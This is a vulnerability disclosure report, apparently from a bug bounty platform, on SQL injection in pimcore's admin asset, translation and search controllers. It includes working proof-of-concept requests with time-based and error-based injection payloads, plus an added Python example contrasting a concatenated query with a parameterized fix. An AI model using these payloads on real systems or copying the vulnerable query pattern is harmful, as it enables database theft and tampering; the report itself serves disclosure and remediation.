SQL injection in pimcore/pimcore
Status: Valid
Reported on Mar 23rd 2023
Description
Multiple SQL injections caused by unsanitized strings being concatenated into WHERE clauses.
Collaborator: @ub3rsick
Proof of Concept - assets controller
1. To trigger the vulnerable request: go to Files -> Assets -> select a folder -> right click -> Download as ZIP.
2. Replay the request to /admin/asset/download-as-zip-add-files; the injection point is the selectedIds parameter.
Exploitation is blind: a time delay can be induced with a request like the following:
GET /admin/asset/download-as-zip-add-files?_dc=1679556461362&id=287&selectedIds=1,4,1+and+sleep(4)+or+1,2&offset=10&limit=5&jobId=641bfd26c1d25 HTTP/1.1
Proof of Concept - translations controller
/admin/translation/export?domain=messages&searchString=er&domain=messages&filter=[{"property":"Type=1+or+extractvalue(rand(),concat(0x3a,version()))--+-","value":"ee","type":"string"}]
Proof of Concept - search controller
GET /admin/search/search/find?_dc=1679542590358&type=document&query=e&subtype=page&context=%7B%22scope%22%3A%22globalSearch%22%7D&page=1&start=0&limit=50&class=CustomerSegmentGroup&property=key&filter=[{"property":"key"}]&fields[]=Bodywork_CAR+`o_id`on+`fieldname`))+or+extractvalue(rand(),concat(0x3a,version()))--+---+-~
Impact
Dump the database, alter data, or perform a DoS against the backend DBMS.
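The weakness the report describes, an id list concatenated straight into a WHERE clause, shown beside an allow-listed, parameterized version. This is an added example in Python against an in-memory SQLite table, not pimcore's PHP code; the table, its columns, the fetch functions and the payload constant (the report's selectedIds value, URL-decoded) are assumptions made for illustration.

```python
import re
import sqlite3

# Constructed stand-in for an assets table; not pimcore's schema.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE assets (id INTEGER PRIMARY KEY, filename TEXT)")
    conn.executemany("INSERT INTO assets VALUES (?, ?)",
                     [(1, "a.jpg"), (2, "b.jpg"), (4, "d.jpg"), (287, "folder")])
    return conn

# The selectedIds value from the report's request, URL-decoded ('+' -> space).
REPORT_PAYLOAD = "1,4,1 and sleep(4) or 1,2"

def fetch_vulnerable(conn: sqlite3.Connection, selected_ids: str) -> list[int]:
    # Weak pattern the report describes: the raw parameter is concatenated
    # into the WHERE clause, so whatever it contains is parsed as SQL.
    sql = "SELECT id FROM assets WHERE id IN (" + selected_ids + ")"
    return sorted(row[0] for row in conn.execute(sql))

ID_LIST = re.compile(r"\d+(,\d+)*")

def parse_id_list(selected_ids: str) -> list[int]:
    # Allow-list validation: the parameter must be a comma-separated list of
    # unsigned integers; anything else is rejected before it reaches the DBMS.
    if not ID_LIST.fullmatch(selected_ids):
        raise ValueError("selectedIds must be a comma-separated list of integers")
    return [int(v) for v in selected_ids.split(",")]

def fetch_hardened(conn: sqlite3.Connection, selected_ids: str) -> list[int]:
    # Validated ids are bound as parameters; the SQL text never contains user input.
    ids = parse_id_list(selected_ids)
    placeholders = ",".join("?" * len(ids))
    sql = f"SELECT id FROM assets WHERE id IN ({placeholders})"
    return sorted(row[0] for row in conn.execute(sql, ids))

if __name__ == "__main__":
    db = make_db()
    print(fetch_hardened(db, "1,4"))  # [1, 4]
    try:
        fetch_hardened(db, REPORT_PAYLOAD)
    except ValueError as e:
        print("rejected before reaching the database:", e)
```

With the vulnerable function the report's payload reaches the database engine (SQLite has no sleep() function, so it fails there with an engine error), while the hardened function rejects it during validation and never builds SQL from it.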
Report timeline:
- We are processing your report and will contact the pimcore team within 24 hours. (2 months ago)
- We have contacted a member of the pimcore team and are waiting to hear back. (2 months ago)
- rekter0 modified the report. (2 months ago)
- rekter0 modified the report. (2 months ago)
- The researcher's credibility has increased: +7
- The fix bounty has been dropped.
- This vulnerability has been assigned a CVE.